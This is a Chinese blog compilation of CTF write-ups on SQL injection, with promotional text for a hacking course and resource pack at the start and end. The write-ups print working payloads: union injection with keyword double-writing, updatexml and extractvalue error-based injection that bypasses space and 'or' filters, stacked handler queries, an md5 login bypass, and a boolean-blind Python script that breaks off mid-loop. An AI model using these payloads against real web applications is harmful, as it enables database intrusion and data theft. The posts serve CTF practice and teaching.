给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
1' ununionion seselectlect 1,database(),3#
采用第三列进行注入
爆所有数据库(关键命令采用双写进行绕过)
1' ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#
根据常识ctf数据库里面存在flag的可能更大,故选择ctf数据库
爆ctf数据库里面的数据表
1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#
因为ctf在schema里面所有这里就是table_schema,schema里面的数据库ctf里面的数据表
得到Flag数据表
爆Flag数据表里面的字段
1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='Flag'#
得到flag字段
爆flag字段内容
1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#
ctf.Flag意思就是ctf数据库里面的Flag数据表
得到flag:
flag{fbd18420-cab7-4d6e-8fb9-f8ea6febda61}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134277587?spm=1001.2014.3001.5502
报错注入原理
【例题】非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
题目环境:
没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了
做了好多这个作者出的题了,看来又要上强度了
判断注入类型
username:admin
password:1
这里把参数password作为注入点
1'
单引号的字符型注入
万能密码注入
1' or '1'='1
万能密码注入被链接
猜测某些字符或者关键字被过滤
SQL注入字典查过滤字符
Intruder字典爆破
光标选中参数password的值1-Add选择爆破目标
选用字典
Start attack开始爆破
OK
爆破结果:
741为过滤内容
可以看到很多字符=、–+、/**/和一些注入命令union、by、‘1’='1等被过滤
继续测试
admin
1’ or
可以看到被拦截了
通过刚才的字典爆破,可以知道1’和or是没有被过滤的
那么真相只有一个,卧槽,空格被过滤了,我直呼好家伙
刚开始本想尝试编码绕过空格,结果不行,这里猜测到了空格限制
空格限制
admin
1’(or)
like没有被过滤,使用like可以绕过=号,like <=> =
重新构造万能密码
1'or((1)like(1))#
可以看到绕过了空格限制
同时也登陆成功了
然后想到了之前做过很类似的一道题
SQL报错注入也用到了空格限制
(已经试了堆叠注入和联合注入都不行)
这里就索性试一下SQL报错注入
知识一、
SQL报错注入常用函数
两个基于XPAT(XML)的报错注入函数
函数updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数
函数extractvalue() 是mysql对xml文档数据进行查询的xpath函数
注入原理:
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!)
(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)其它
函数floor() mysql中用来取整的函数
函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数
首先使用updatexml()函数进行SQL报错注入
爆库
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
得到库名geek
查表
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
得到数据表H4rDsq1
爆字段
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
得到三个字段:id、username、password
查字段内容
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
得到前一半flag值flag{389c9161-c2eb-403a-80
使用right()突破字符限制
1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#
得到后一段flag值b-403a-8062-80f219ca1c30}
拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}
使用extractvalue()函数进行SQL报错注入
知识:^这个符号可以绕过or的限制
这两种函数大同小异,不再赘述
当然也可以不使用^来绕过or限制,单一的()绕过空格限制也可以
大家可以看下边进行对比学习
1'^extractvalue(1,concat(0x7e,(select(database()))))#
1'or(extractvalue(1,concat(0x7e,(select(database())))))#
好了大家已经明显看到了^和()绕过不同限制的区别
那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#
1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))#
使用right()突破字符限制
1'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),30))#
拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773
md5与SQL之间的碰撞
【例题】BUUCTF [GXYCTF2019]BabySQli 1 详解!
题目环境
burp抓包
随便输入值
repeater放包
在注释那里发现某种编码
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
看着像是base编码格式
通过测试发现是套加密(二次加密)
首先使用base32对此编码进行解码
base32解码
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
两个等号base64编码无疑了
base64解码
得到一段SQL查询语句
select * from user where username = '$name'
通过对这段SQL语句的初步判断
可以得出此题的注入点是参数name
判断注入类型
1
123
1’
123
发生报错
可以得出此题的注入类型为字符型注入
尝试万能密码
1’ or ‘1’='1
123
猜测’or’关键字或’='字符被过滤
弱口令猜测
首先猜测用户名既有可能是admin
密码暂且还不知道
判断字段数
1’ union select 1,2#
123
1’ union select 1,2,3#
123
可知字段数是3
判断用户所在列
1’ union select ‘admin’,2,3#
123
1’ union select 1,‘admin’,3#
123
通过用户所在列测试,得出了存在用户admin,又得出了admin用户在第二列,也就是username字段那一列。
查看题目源码
在search.php源代码哪里发现关键代码
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
发现参数password被md5加密
看着和之前做过的题很类似
大致就是传进去的值要进行md5值加密
换种方式猜测
username数据表里面的3个字段分别是flag、name、password。
猜测只有password字段位NULL
咱们给参数password传入的值是123
那么传进去后,后台就会把123进行md5值加密并存放到password字段当中
当我们使用查询语句的时候
我们pw参数的值会被md5值进行加密
然后再去与之前存入password中的md5值进行比较
如果相同就会输出flag
爆flag:
这里pw参数的值为123456
可以随便传
但是要对传入的那个值进行md5值加密
网上可以随便找一个在线md5加密平台
1’union select 1,‘admin’,‘e10adc3949ba59abbe56e057f20f883e’#
123456
得出flag:
flag{3c7be44e-df35-40a7-bd91-1b210bf75fcb}
handler命令用法
【例题】BUUCTF [GYCTF2020]Blacklist 1详解
题目环境
判断注入类型
1
1’
可知本题是字符型注入
查库
此题使用堆叠查询
1’;show databases;
查表
1’;show tables;
存在FlagHere数据表
极有可能当中存在flag
查字段数
– - 是闭合符
1’ order by 3 – -
1’ order by 2 – -
可知只有两个字段数
查FlagHere数据表的字段名
1’;show columns from FlagHere;
存在flag字段!
查words数据表的字段名
1’;show columns from words;
从这里看的话这题与buuctf[强网杯 2019]随便注 1这道题是有几分相似的
后者是通过改表名来获取flag值,但是前者既然放到了后边,应该没有那么容易
猜测修改表名的命令极有可能被过滤了
后者题解非常详细可以看看下面这个链接(同时也包含handler解法!)
https://blog.csdn.net/m0_73734159/article/details/134049744
判断命令是否存在过滤
rename
return preg_match(“/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i”,$inject);
果不其然改表名的两个关键命令被过滤了
rename和alter
包括查询命令也被过滤了
select
通过handler命令获取flag
select这个查询命令大家都很熟悉
但是我们却忽略了一个也很重要的角色
那就是handler查询命令
虽然handler这个命令不常见
但是它也非常强大
handler命令查询规则
handler table_name open;handler table_name read first;handler table_name close;handler table_name open;handler table_name read next;handler table_name close;
如何理解?
- 首先打开数据库,开始读它第一行数据,读取成功后进行关闭操作。
- 首先打开数据库,开始循环读取,读取成功后进行关闭操作。
构造payload
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;1';handler FlagHere open;handler FlagHere read next;handler FlagHere close;
上传payload
得到flag:
flag{29e0c4b0-b659-4115-a74c-f3c25d3aac9b}
原文链接:https://blog.csdn.net/m0_73734159/article/details/134731461?spm=1001.2014.3001.5501
布尔盲注
【例题】BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注)
题目环境
判断注入类型
1
2
3
1’
输入1’报错提示bool(false)
可知是字符型的布尔注入(盲注)
尝试万能密码
1’ or ‘1’=1
已检测SQL注入
猜测某些关键字或者字符被过滤
FUZZ字典爆破
可以看到部分关键字被过滤,包括空格
All You Want Is In Table ‘flag’ and the column is ‘flag’
Now, just give the id of passage
通过提示可以知道
flag字段在flag数据表里面
布尔注入
布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。
布尔盲注
布尔盲注,也称为基于布尔的盲注,是一种SQL注入攻击方式。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。
在进行布尔盲注攻击时,攻击者首先需要对目标应用程序进行SQL注入,然后根据页面返回的结果来判断注入是否成功。由于页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入。因此,这种攻击方式比较消耗时间,速度较慢。
在布尔盲注中,攻击者可能会使用一些常用的函数,如length()函数和ascii()函数。length()函数用于返回字符串的长度,ascii()函数用于返回字符串的字符ASCII码值。这些函数可以帮助攻击者更好地分析和理解返回结果,从而获取更多的信息。
总之,布尔盲注是一种比较复杂的SQL注入攻击方式,需要攻击者具备一定的技术水平和耐心。为了防止布尔盲注攻击,应该加强应用程序的安全性,如进行输入验证、使用参数化查询等措施。
通过脚本爆破flag
import requests
#调用请求模块
import time
#调用时间模块
import re
#调用规则表达式模块
url='http://1c6ac3dd-eab6-41d6-85a3-a5f888577768.node4.buuoj.cn:81/'
#题目链接
flag = ''
#创建一个变量用来存放flag值
for i in range(1,50):
#for循环遍历,i表示flag值大致长度是50以内
max = 127
#赋值127
min = 0
#赋值0
for c in range(0,127):
#for循环遍历
s = (int)((max+min)/2)
#首先将 max 和 min 相加,然后除以 2,最后将结果强制转换为整数类型。
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
#^异或运算符,相同为假,不相同为真,1^payload,若为payload结果为假,则返回0,1^0=1,将得到查询id=1时的结果,回显Hello, glzjin wants a girlfriend。
#从flag数据表中选择一个名为flag的字段,然后取这个字段的字符串(从位置 '+str(i)+' 开始,长度为 1(每次只返回一个))
#将这个字符串转换为 ASCII 码,然后判断这个 ASCII 码是否大于一个名为 "s" 的变量。
r = requests.post(url,data = {'id':payload})
#requests模块的运用,将payload赋值给题目中这个名为id的参数
time.sleep(0.005)
#每循环一次休眠0.005秒
if 'Hello' in str(r.content):
#如果Hello这个字符串在生成的结果中,那么就继续向下进行
max=s
#将s的值赋值给max
### 如何自学黑客&网络安全
#### 黑客零基础入门学习路线&规划
**初级黑客**
**1、网络安全理论知识(2天)**
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
**2、渗透测试基础(一周)**
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
**3、操作系统基础(一周)**
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
**4、计算机网络基础(一周)**
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
**5、数据库基础操作(2天)**
①数据库基础
②SQL语言基础
③数据库安全加固
**6、Web渗透(1周)**
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
如果你想要入坑黑客&网络安全,笔者给大家准备了一份:282G全网最全的网络安全资料包评论区留言即可领取!
**7、脚本编程(初级/中级/高级)**
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
如果你零基础入门,笔者建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习;搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime;·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;·用Python编写漏洞的exp,然后写一个简单的网络爬虫;·PHP基本语法学习并书写一个简单的博客系统;熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选);·了解Bootstrap的布局或者CSS。
**8、超级黑客**
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
#### 网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,评论区点赞和评论区留言获取吧。我都会回复的
视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一些笔者自己买的、其他平台白嫖不到的视频教程。
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
1615
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
